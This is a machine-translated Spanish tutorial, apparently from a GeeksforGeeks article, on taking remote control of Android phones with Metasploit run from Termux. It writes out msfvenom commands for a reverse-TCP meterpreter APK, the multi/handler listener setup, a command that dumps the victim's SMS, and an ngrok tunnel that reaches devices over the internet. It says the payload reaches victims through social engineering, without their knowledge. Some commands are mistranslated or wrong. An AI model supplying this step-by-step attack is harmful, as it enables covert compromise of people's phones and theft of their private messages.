El acceso remoto es una vulnerabilidad a través de la cual los atacantes pueden controlar cualquier dispositivo. Más comúnmente, las cargas útiles se utilizan para el control remoto. Las cargas útiles se envían mediante ingeniería social o ataques de phishing. Una vez que se inyecta la carga útil, comienza el ataque real. La carga útil proporcionará una conexión inversa. Más comúnmente, el marco Metasploit se usa para generar cargas útiles. Hay tres tipos diferentes de módulos de carga útil en Metasploit Framework:
- Individual
- Escenarios
- Etapas.
veamos cómo podemos explotar y obtener acceso remoto a un dispositivo Android usando Metasploit. En Android, necesitamos termux para ejecutar Metasploit. Después de instalar termux, necesitamos instalar el marco Metasploit.
Después de instalar el marco Metasploit, simplemente ejecute pkg update && pkg upgrade para actualizar su máquina. Luego escriba termux-setup-storage para evitar problemas relacionados con los permisos. termux-setup-storage es el comando utilizado en termux para proporcionar permiso de almacenamiento. Esto se hace para almacenar la carga útil dentro del dispositivo o para copiar la carga útil de termux al móvil. ahora, si escribe el comando ls, puede ver un directorio llamado almacenamiento. ls significa listar el directorio actual y es un comando usado en Linux para listar archivos dentro del directorio actual.
Comandos básicos:
- $actualización de paquete && actualización de paquete
- $termux-configuración-almacenamiento
Podemos generar diferentes tipos de cargas útiles en función de los requisitos. Primero generemos una carga útil para obtener acceso a un dispositivo que esté conectado a la misma red. la misma red se refiere a dispositivos conectados entre sí, ya sea directamente o a través de un punto de acceso móvil (red inalámbrica). generemos una carga llamada Geeks.apk.
Generar carga útil usando el siguiente comando msfvenom contiene opciones de línea de comandos estándar que se usan para generar la carga útil. lhost representa su dirección IP. simplemente escriba ifconfig para conocer su dirección IP. lport será el número de puerto, puede ingresar su propio número de puerto.
- $msfvenom -p android/meterpreter/reverse_tcp lhost=192.168.60.255 lport=5321 R> Geeks.apk
Después de generar la carga útil, copie la carga útil en su almacenamiento usando el comando cp Geeks.apk storage. Ahora puede ver la carga dentro del almacenamiento simplemente escribiendo cd storage y ls.
Ahora solo vaya al almacenamiento y descargue Geeks.apk y permita todos los permisos. Esto proporcionará una conexión inversa a la máquina host.
Veamos cómo podemos explotar esto. Simplemente ingrese el comando msfconsole . Esto abrirá una nueva interfaz. luego ingrese los siguientes comandos.
msf6 > use exploit/multi/handler msf6 exploit(multi/handler) > set payload android/meterpreter/reverse_tcp msf6 exploit(multi/handler) > set LHOST your_ip msf6 exploit(multi/handler) > set PAYLOAD your_port msf6 exploit(multi/handler) > exploit
Nota: Ingrese lhost y lport lo que ingresó al generar la carga útil.
Ahora tenemos una sesión de meterpreter. La sesión de meterpreter no es más que una conexión inversa. puede escribir ayuda si desea saber qué podemos hacer con esta sesión.
puedes hacer muchas cosas usando esta carga útil. intentemos obtener mensajes del dispositivo de la víctima para esto, debe escribir dump_sms $HOME . dump_sms se refiere al comando para enviar todos los SMS desde el dispositivo de la víctima a nuestro dispositivo y $HOME se refiere a la ubicación para almacenar SMS. Podemos mover este archivo SMS desde el directorio de inicio a nuestro almacenamiento usando el comando:
$ mv sms_file_name storage $ cd storage $ mv sms_file-name downlods
Ahora puede leer fácilmente todos los mensajes de las descargas:
El acceso remoto resultará en la pérdida de confidencialidad. Un atacante puede hacer lo que quiera. Pero esto está en localhost.
Ahora veamos cómo se puede explotar el dispositivo en algún lugar del mundo. Para ello, Wireless deberíamos descargar ngrok . Ya que estamos explotando a través de WAN (red de área inalámbrica). Descargue ngrok para Linux desde el sitio web de ngrok . En termux escriba el siguiente comando:
$ cd storage //refers to change directory from home to storage. $ cd downloads //refers to changing the directory from storage to downloads. $ mv ngrok $HOME //move ngrok from downloads to the home directory. $ chmod +x ngrok //providing permission
En la mayoría de los casos, ngrok no se ejecuta en un entorno normal. así que necesito descargar ubuntu o cualquier sistema operativo externo. Puede descargar ubuntu fácilmente a través de la aplicación AnLinux.
Después de instalar ngrok con éxito, regístrese en ngrok y valide su token de autenticación siguiendo el comando. puede encontrar su token de autenticación una vez que inicie sesión en ngrok.
$ ./ngrok config add-authtoken <token>
Ahora deberíamos ejecutar un servidor TCP para el reenvío de puertos. Para ejecutar el servidor TCP, use el siguiente comando.
$ ./ngrok tcp 5431
la creación de la carga útil es similar a la anterior, pero lhost y lport deben cambiarse de acuerdo con ngrok. En el caso anterior, LHOST será 6.tcp.ngrok.io y LPORT será 16960. Diferirá cada vez que ejecutemos el servidor TCP usando ngrok. ngrok debería activar otra sesión para establecer una conexión.
$ msfvenom -p android/meterpreter/ reverse_tcp lhost=6.tcp.ngrok.io lport=16960 R> Geeks.apk
Como antes, mueva la carga útil del directorio de inicio a las descargas. Ahora la carga útil debe enviarse al dispositivo de la víctima y depende de sus habilidades de ingeniería social. Después de instalar con éxito la carga útil en el dispositivo de la víctima, ejecute msfconsle para obtener una sesión de intérprete. para esto use los siguientes comandos.
msf6 > use exploit/multi/handler msf6 exploit(multi/handler) > set payload android/meterpreter/reverse_tcp msf6 exploit(multi/handler) > set LHOST 0.0.0.0 msf6 exploit(multi/handler) > set PAYLOAD your_port (in my case it is 5544) msf6 exploit(multi/handler) > exploit
Ahora usando esto obtenemos acceso al dispositivo de la víctima. Podemos hacer muchas cosas sin el conocimiento de las víctimas. Así es como funciona el acceso remoto. Hay muchas maneras a través de las cuales podemos obtener acceso a un dispositivo remoto. Por lo general, las puertas traseras se crean para permanecer dentro de los dispositivos de las víctimas. payload es un tipo de puerta trasera a través de la cual explotamos el dispositivo de destino.
Publicación traducida automáticamente
Artículo escrito por akshaysavanoor y traducido por Barcelona Geeks. The original can be accessed here. Licence: CCBY-SA